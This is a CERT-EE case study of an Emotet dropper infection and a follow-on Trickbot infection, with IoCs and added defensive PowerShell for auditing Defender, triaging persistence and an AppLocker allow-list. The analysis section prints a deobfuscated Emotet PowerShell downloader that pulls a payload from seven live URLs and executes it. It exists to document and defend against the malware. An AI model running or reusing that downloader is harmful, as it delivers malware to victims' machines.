Case study: the tale of one Emotet infection
By: CERT-EE / Estonian Information System Authority
Date: 23 October 2020
Tags: Emotet, malware, cybercrime, Trickbot
Summary
Emotet malware has been around since 2014. It is mostly spread through malicious e-mail attachments, often disguised as forwarded e-mails or as replies to an earlier discussion. Because Emotet hijacks existing e-mail threads to spread itself, both the discussion and the sender look familiar to the victim, who is therefore more likely to open the attachment. According to CERT-EE's estimate, tens of thousands of infected files are sent daily to individuals and enterprises in Estonia, which currently makes Emotet the most prevalent malware family distributed in Estonia. As Emotet steals e-mails, there is also a risk of data leakage, which can result in a GDPR breach or contractual penalties. Emotet is also often used as a downloader for additional malware that steals credentials stored in browsers. Enterprises using cloud services should therefore be extra careful and require two-factor authentication. The purpose of this case study was to understand better how a current variant of Emotet works, so that we can recommend ways to mitigate the risk in advance and describe what to look out for in case of a suspected infection. An important finding is that while modern anti-virus software works against a large variety of malware, including Emotet, it is important to use its full functionality.
Case study timeline
For this case study we used Windows 10 v.2009 with the built-in Microsoft Defender antivirus, with slightly modified settings. It should be noted that infecting the machine in its default configuration was not successful, as Microsoft Defender removed the malware. For the infection to succeed, Defender's "Cloud-delivered protection" had to be disabled.
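The setting that had to be switched off for the infection to succeed is a normal Defender preference, so it can be audited and restored from PowerShell. The script below is an added example, not part of the CERT-EE write-up; it uses the built-in Defender module cmdlets (Get-MpPreference, Set-MpPreference, Get-MpComputerStatus) and checks the settings that mattered in this case: cloud-delivered protection (MAPSReporting), sample submission, real-time protection, tamper protection and whether the scheduled scan is a full scan. The function and property names other than the cmdlets are this example's own.

```powershell
# Added example (not from the CERT-EE write-up): audit the Microsoft Defender
# settings that decided the outcome of this case study, and optionally restore
# them. Run in an elevated PowerShell on Windows 10 with Microsoft Defender.

function Get-DefenderCloudPosture {
    # Returns the relevant settings plus a list of findings (empty = all good).
    $pref   = Get-MpPreference
    $status = Get-MpComputerStatus
    $findings = @()

    # MAPSReporting: 0 = Disabled, 1 = Basic, 2 = Advanced. This is what the
    # Windows Security UI calls "Cloud-delivered protection"; the dropper in
    # the case study only got through once it was 0.
    if ($pref.MAPSReporting -eq 0) { $findings += 'Cloud-delivered protection is OFF' }

    # SubmitSamplesConsent: 0 = Always prompt, 1 = Send safe samples,
    # 2 = Never send, 3 = Send all samples. Cloud analysis of unknown droppers
    # relies on sample submission.
    if ($pref.SubmitSamplesConsent -eq 2) { $findings += 'Automatic sample submission is OFF' }

    if ($pref.DisableRealtimeMonitoring) { $findings += 'Real-time protection is OFF' }
    if (-not $status.IsTamperProtected)  { $findings += 'Tamper protection is OFF (malware or users can change these settings)' }

    # ScanParameters: 1 = QuickScan, 2 = FullScan. The recommendation is a
    # policy of mandatory, regular full scans.
    if ($pref.ScanParameters -ne 2) { $findings += 'Scheduled scan is not a full scan' }

    [pscustomobject]@{
        MAPSReporting        = $pref.MAPSReporting
        SubmitSamplesConsent = $pref.SubmitSamplesConsent
        RealTimeProtection   = $status.RealTimeProtectionEnabled
        TamperProtected      = $status.IsTamperProtected
        ScheduledScanType    = $pref.ScanParameters
        Findings             = $findings
    }
}

function Set-DefenderRecommendedPosture {
    # Turn cloud-delivered protection on at the most aggressive level and
    # schedule a weekly full scan (Sunday 02:00). If tamper protection is on,
    # Defender rejects changes to the protected settings from PowerShell; use
    # the Windows Security app or your management tooling in that case.
    Set-MpPreference -MAPSReporting Advanced `
                     -SubmitSamplesConsent SendAllSamples `
                     -CloudBlockLevel High `
                     -CloudExtendedTimeout 50
    Set-MpPreference -ScanParameters FullScan `
                     -ScanScheduleDay Sunday `
                     -ScanScheduleTime 02:00
}

$posture = Get-DefenderCloudPosture
$posture | Format-List
if ($posture.Findings.Count -gt 0) {
    Write-Warning ("Defender posture needs attention: " + ($posture.Findings -join '; '))
    # Uncomment to apply the recommended settings:
    # Set-DefenderRecommendedPosture
}
```

On a fleet, run Get-DefenderCloudPosture through your remote management tooling and alert on any host whose Findings list is non-empty; a machine reporting MAPSReporting 0 is in exactly the state that let this infection through.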
Figure 1. Infected Emotet dropper .doc file; the user had to enable the macro for it to run
After clicking "Enable Content", a well obfuscated macro ran and launched PowerShell with a base64-encoded, obfuscated command.
Figure 2. PowerShell command, base64-encoded and obfuscated
After deobfuscating and base64-decoding it, the following instructions were found in the PowerShell command (reformatted one statement per line, with the string quotes the deobfuscation output had stripped restored; the comments are ours):
--------
# Junk assignments to unused variables are interleaved with the real logic
$P2t896q = 'Zgmfcmh'; $Cpa3yo3 = '*'; $T9qq_nc = 'Gh2sw4h'
# Create a random-looking two-level directory under the user profile
& new-item $eNv:useRprOFILe\QeZTn1z\P_WSvqA\ -itemtype dIrECtORY
$Kcg966b = 'Rsthnuk'
[Net.ServicePointManager]::"secUriTypROtocoL" = 'tls12, tls11, tls'
$Ua2xau0 = 'R1x2d9w'; $O0umshk = 'Zz2_fj'; $X8y3s56 = 'S8s1vbu'; $Wd0jfik = 'T7mjz5l'
# Destination of the payload: %USERPROFILE%\Qeztn1z\P_wsvqa\Zz2_fj.exe
$Zs8dvz7 = "$env:userprofile\Qeztn1z\P_wsvqa\$O0umshk" + ('.exe')
$Nj62m3r = 'Vj85wha'
$Ly7vast = new-object Net.WebClient
# Seven download locations, joined with '*' and split into an array
$Qqgc6sh = 'http://financiamentointeligente.com/wp-content/Fj/*http://www.removepctrojan.com/wp-admin/6/*http://aahnaturals.net/wp-includes/TX/*http://www.sff3d.com/3d/xk/*https://engineering-2s.com/SS_Paypal/X/*https://lsmanga.com/migration/FaU/*https://beta.zoneberry.com/bysyswexecf/x3/'.spLiT($Cpa3yo3)
$Ka78g_w = 'P_awrw3'
# Try each URL in turn; a download only counts if the file is at least 30706
# bytes, which filters out error pages and take-down notices
foreach ($Kk9rucd in $Qqgc6sh) {
    try {
        $Ly7vast."DOwnloADFile"($Kk9rucd, $Zs8dvz7)
        $Pogmg4m = 'Quq7lrc'
        If ((.Get-Item $Zs8dvz7)."lEngTh" -ge 30706) {
            .Invoke-Item($Zs8dvz7)   # execute the downloaded payload
            $E5z9o9t = 'Ffm269h'
            break
# (the command ends here in the original write-up; the closing braces and the catch block were not reproduced)
--------
With this PowerShell command the Emotet payload is downloaded and executed on the machine. The command contained seven sites from which the payload could be downloaded. Since the first download site had already been taken down (step 1), the payload was delivered from the next site (step 2) and infected the computer. The payload then sent data from the infected machine to the C2 (step 3).
Figure 3. Downloading malware payload and uploading data from
victim to C2.
In less than 30 minutes the infected device was turned into an Emotet spreading drone that, on instructions from the C2, started sending out new malicious dropper .doc files to new victims.
Figure 4. Sending out Emotet droppers to new victims.
About 15 minutes after the infection the device was also infected with Trickbot malware. Below is a typical Trickbot infection: checking the public IP address (step 1), downloading the Trickbot payload (step 2), sending out form data from the Edge browser (step 3) and stealing and sending out the Gmail password stored in the mail client of the infected machine (step 4).
Figure 5. Emotet infected device being infected with Trickbot
malware
Figure 6. Trickbot stealing user credentials from mail client
for Google account
Trickbot injects itself into the Windows Problem Reporting process, wermgr.exe, and uses that process to communicate with its C2.
Figure 7. Trickbot communication via wermgr.exe
To gain persistence, Emotet writes itself to the HKEY_CURRENT_USER registry hive, under HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run. Trickbot uses Task Scheduler: it creates a task that executes at user logon.
Figure 8. Trickbot persistence
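Both persistence locations described above can be enumerated without elevation, since they belong to the logged-on user. The following triage script is an added example and not part of the CERT-EE write-up; it lists every HKCU Run entry and every scheduled task with a logon trigger, resolves the executable each one points at, and flags those living in a user-writable location such as the profile directory, which is where both Emotet and Trickbot placed their files in this case. The function names and the list of user-writable roots are this example's own choices.

```powershell
# Added example (not from the CERT-EE write-up): triage the two persistence
# mechanisms seen in the case study, HKCU Run values and logon-triggered
# scheduled tasks, and flag entries whose executable lives where the user can
# write. Run as the affected user; Get-ScheduledTask needs Windows 8/2012 or later.

# Locations a standard user can write to; a legitimate autostart rarely lives here.
$UserWritableRoots = @($env:USERPROFILE, $env:ProgramData, "$env:windir\Temp", "$env:windir\Tasks")

function Get-ExecutablePath {
    # Extract the program path from a command line such as
    # '"C:\Users\x\Qeztn1z\P_wsvqa\Zz2_fj.exe" /arg' or '%APPDATA%\a.exe b c'
    param([string]$CommandLine)
    if ([string]::IsNullOrWhiteSpace($CommandLine)) { return $null }
    if ($CommandLine -match '^\s*"([^"]+)"') { return [Environment]::ExpandEnvironmentVariables($Matches[1]) }
    return [Environment]::ExpandEnvironmentVariables(($CommandLine.Trim() -split '\s+')[0])
}

function Test-UserWritablePath {
    param([string]$Path)
    if (-not $Path) { return $false }
    foreach ($root in $UserWritableRoots) {
        if ($root -and $Path.StartsWith($root, [StringComparison]::OrdinalIgnoreCase)) { return $true }
    }
    return $false
}

function Get-RunKeyEntries {
    # HKCU\...\Run is what Emotet used; writing it needs no admin rights.
    $key = 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
    if (-not (Test-Path $key)) { return }
    $item = Get-ItemProperty -Path $key
    foreach ($p in $item.PSObject.Properties) {
        if ($p.Name -in 'PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider') { continue }
        $exe = Get-ExecutablePath ([string]$p.Value)
        [pscustomobject]@{
            Source       = 'HKCU Run'
            Name         = $p.Name
            Command      = [string]$p.Value
            Executable   = $exe
            UserWritable = Test-UserWritablePath $exe
            Exists       = [bool]($exe -and (Test-Path -LiteralPath $exe))
        }
    }
}

function Get-LogonTaskEntries {
    # Trickbot registered a task that fires at user logon; list every such task.
    foreach ($task in Get-ScheduledTask) {
        $atLogon = $task.Triggers | Where-Object { $_.CimClass.CimClassName -eq 'MSFT_TaskLogonTrigger' }
        if (-not $atLogon) { continue }
        foreach ($action in $task.Actions) {
            if (-not $action.Execute) { continue }   # COM-handler actions have no Execute
            $exe = Get-ExecutablePath $action.Execute
            [pscustomobject]@{
                Source       = "Task $($task.TaskPath)$($task.TaskName)"
                Name         = $task.TaskName
                Command      = ("$($action.Execute) $($action.Arguments)").Trim()
                Executable   = $exe
                UserWritable = Test-UserWritablePath $exe
                Exists       = [bool]($exe -and (Test-Path -LiteralPath $exe))
            }
        }
    }
}

$entries = @(Get-RunKeyEntries) + @(Get-LogonTaskEntries)
$entries | Sort-Object UserWritable -Descending |
    Format-Table Source, Name, Executable, UserWritable, Exists -AutoSize

$suspicious = @($entries | Where-Object { $_.UserWritable })
if ($suspicious.Count -gt 0) {
    Write-Warning "$($suspicious.Count) autostart entries point into user-writable locations; review them."
}
```

An entry that is flagged UserWritable and whose executable also has a random-looking name two directories deep under the profile, like the path the deobfuscated downloader built, deserves a hash lookup and a look at the file's creation time; an entry flagged UserWritable whose file no longer Exists is usually leftover from a removed infection and still worth cleaning up.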
Four days later, Google informed that the account had been suspended due to a suspicious login.
Figure 9. Notification (in Estonian) that the account has been
suspended
After account recovery, it was evident from the logs that Google had disabled the account after a suspicious login attempt from Vietnam using the stolen credentials.
Figure 10. Login attempt from Vietnam that triggered account
suspension
Figure 11. Login attempt from Vietnam that triggered account
suspension
From the behaviour of Emotet it is evident that, on top of using the infected device to send out new malware, the stolen e-mail accounts themselves are used to spread malicious files.
Figure 12. Google account was used for sending malware
Conclusion
Emotet remains a villain that needs to be taken seriously, both on its own and as a source of further malware, which in our case was Trickbot. The case shows that both malware families remain up and running despite efforts to bring an end to them.
Based on this case study, CERT-EE recommends that enterprises:
• use antivirus software to its full functionality. Disabling features that antivirus vendors have developed to protect their customers (e.g. leveraging cloud-based information) puts users and their enterprises at risk;
• set up a policy of mandatory and regular full scans, together with central management and alerting for antivirus products;
• block or quarantine at the perimeter e-mails carrying documents that contain macros or password-protected archives, so that such attachments never reach users' mailboxes;
• for visibility and detection, ensure that visibility is not reduced when devices move outside the perimeter. Visibility of the devices should be retained through technical means such as always-on forced VPN tunnels, and the use of split tunnelling should be weighed against the risk of suspicious traffic bypassing firewall/IDS/IPS investments;
• since both Emotet and Trickbot used the user profile directory for their actions and persistence, enforce AppLocker policies (Windows 10 / Windows Server) designed so that programs and scripts may only execute from whitelisted directories, excluding the user profile directory and any other directory the user has the right to write to;
• do not assign the administrator role to users' everyday accounts. Administrative work should be done from a separate account that is limited in other respects, e.g. no mailbox and limited access to network resources;
• e-mail service providers should apply similar checks for e-mails containing malicious URLs and malware, and refuse delivery in both the inbound and outbound direction.
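The AppLocker recommendation above can be expressed as a small path-based policy. The following is an added example, not a policy from CERT-EE: it allows executables and scripts only from Program Files and the Windows directory, carves the user-writable subfolders of %WINDIR% out of that allowance (the stock "Windows folder" rule would otherwise whitelist them), and deliberately lists no path under the user profile, so a payload dropped at a location like %USERPROFILE%\Qeztn1z\P_wsvqa\ is denied. The rule GUIDs and names are this example's own, the policy is written in audit mode so it can be trialled first, and the probe path used in the dry run is constructed. Note that this does not stop the Word macro itself (Word runs from Program Files); it stops the executable the macro drops.

```powershell
# Added example (not from the CERT-EE write-up): a minimal AppLocker policy that
# only allows program execution from trusted, non-user-writable directories,
# plus a dry run against a constructed user-profile path. Requires the AppLocker
# cmdlets (Windows 10 Enterprise/Education or Windows Server) in an elevated shell.

$policyXml = @"
<AppLockerPolicy Version="1">
  <RuleCollection Type="Exe" EnforcementMode="AuditOnly">
    <FilePathRule Id="3a6f6f2b-1d8e-4f2a-9c44-0d9a5b1e7c01" Name="Allow Program Files" Description="" UserOrGroupSid="S-1-1-0" Action="Allow">
      <Conditions><FilePathCondition Path="%PROGRAMFILES%\*" /></Conditions>
    </FilePathRule>
    <FilePathRule Id="3a6f6f2b-1d8e-4f2a-9c44-0d9a5b1e7c02" Name="Allow Windows folder minus user-writable subfolders" Description="" UserOrGroupSid="S-1-1-0" Action="Allow">
      <Conditions><FilePathCondition Path="%WINDIR%\*" /></Conditions>
      <Exceptions>
        <FilePathCondition Path="%WINDIR%\Temp\*" />
        <FilePathCondition Path="%WINDIR%\Tasks\*" />
        <FilePathCondition Path="%WINDIR%\tracing\*" />
      </Exceptions>
    </FilePathRule>
    <FilePathRule Id="3a6f6f2b-1d8e-4f2a-9c44-0d9a5b1e7c03" Name="Administrators may run anything" Description="" UserOrGroupSid="S-1-5-32-544" Action="Allow">
      <Conditions><FilePathCondition Path="*" /></Conditions>
    </FilePathRule>
  </RuleCollection>
  <RuleCollection Type="Script" EnforcementMode="AuditOnly">
    <FilePathRule Id="3a6f6f2b-1d8e-4f2a-9c44-0d9a5b1e7c11" Name="Allow scripts in Program Files" Description="" UserOrGroupSid="S-1-1-0" Action="Allow">
      <Conditions><FilePathCondition Path="%PROGRAMFILES%\*" /></Conditions>
    </FilePathRule>
    <FilePathRule Id="3a6f6f2b-1d8e-4f2a-9c44-0d9a5b1e7c12" Name="Allow scripts in Windows folder minus user-writable subfolders" Description="" UserOrGroupSid="S-1-1-0" Action="Allow">
      <Conditions><FilePathCondition Path="%WINDIR%\*" /></Conditions>
      <Exceptions>
        <FilePathCondition Path="%WINDIR%\Temp\*" />
        <FilePathCondition Path="%WINDIR%\Tasks\*" />
        <FilePathCondition Path="%WINDIR%\tracing\*" />
      </Exceptions>
    </FilePathRule>
    <FilePathRule Id="3a6f6f2b-1d8e-4f2a-9c44-0d9a5b1e7c13" Name="Administrators may run any script" Description="" UserOrGroupSid="S-1-5-32-544" Action="Allow">
      <Conditions><FilePathCondition Path="*" /></Conditions>
    </FilePathRule>
  </RuleCollection>
</AppLockerPolicy>
"@

$policyPath = Join-Path $env:TEMP 'applocker-no-userprofile.xml'
Set-Content -Path $policyPath -Value $policyXml -Encoding UTF8

# Dry run: would a payload dropped in the user profile be allowed? A placeholder
# file is created so Test-AppLockerPolicy has something to evaluate (constructed
# path, modelled on the directory pattern the downloader used).
$probe = Join-Path $env:USERPROFILE 'Qeztn1z\P_wsvqa\probe.exe'
New-Item -ItemType File -Path $probe -Force | Out-Null
Test-AppLockerPolicy -XmlPolicy $policyPath -Path $probe -User Everyone
# Expected PolicyDecision for a standard user: Denied (only the Administrators rule matches '*')
Remove-Item -LiteralPath $probe -Force

# Apply locally (domain-wide deployment goes through Group Policy). AppLocker only
# enforces while the Application Identity service runs.
# sc.exe config appidsvc start= auto; Start-Service appidsvc
# Set-AppLockerPolicy -XmlPolicy $policyPath
# Watch the Microsoft-Windows-AppLocker/EXE and DLL log: event 8003 means "would
# have been blocked" in audit mode. Once no legitimate software appears there,
# switch EnforcementMode from "AuditOnly" to "Enabled".
```

Keep the administrators rule only if administrators really use separate, mailbox-less accounts as the previous recommendation asks; otherwise an administrator opening the dropper in Word would still be able to run the payload. Also expect to add publisher rules for line-of-business software that installs into ProgramData or the profile, rather than widening the path rules.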
Disclaimer
Microsoft Defender was not defeated in any way by Emotet or Trickbot in this case study. In fact, we had to disable "Cloud-delivered protection" to let the malware operate at its most effective in order to learn its behaviour. We did not disable Defender updates, and after every update Defender turned its "real-time protection" back to its default setting: ON. This required no user interaction.
CERT-EE is a department of the Estonian Information System Authority that deals with cyber security incidents occurring in Estonian networks and is, in accordance with the NIS Directive and the Cybersecurity Act, the single point of contact for Estonia.
IoCs
URL:
http[:]//financiamentointeligente[.]com/wp-content/Fj/
http[:]//www.removepctrojan[.]com/wp-admin/6/
http[:]//aahnaturals[.]net/wp-includes/TX/
http[:]//www.sff3d[.]com/3d/xk/
http[:]//engineering-2s[.]com/SS_Paypal/X/
http[:]//lsmanga[.]com/migration/FaU/
http[:]//beta.zoneberry[.]com/bysyswexecf/x3/
JA3:
72a589da586844d7f0818ce684948eea
IP:
80.85.156.116
199.38.121.150
199.38.123.58
208.86.162.215
199.38.120.91
208.86.161.113
208.86.162.241
103.206.128.121
199.38.120.89
103.109.78.174
103.127.165.250
45.89.127.244
104.161.32.125
164.68.107.55
194.5.249.241
181.166.205.18
115.75.42.47
202.79.35.15
124.105.35.15
124.105.107.57
111.246.43.36